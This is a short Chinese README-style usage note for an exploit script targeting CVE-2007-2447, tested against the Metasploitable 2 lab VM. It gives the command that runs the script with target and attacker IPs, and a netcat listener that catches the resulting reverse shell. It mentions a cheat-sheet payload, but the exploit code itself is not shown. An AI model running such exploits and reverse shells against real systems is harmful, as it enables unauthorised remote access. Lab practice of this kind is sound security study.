为了测试该脚本,我推荐你使用虚拟机 "metasploitable 2",可在此处获取。 如果漏洞利用成功,脚本将显示一个反向 shell。要建立连接,只需打开一个 netcat 会话,如下所示:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
以及我的 netcat 端:
netcat -lnvp 1337
结果:
netcat 端:
alt text
脚本端:
alt text
我使用了速查表中的一种载荷。链接在此处。 你可以将其替换为其他载荷。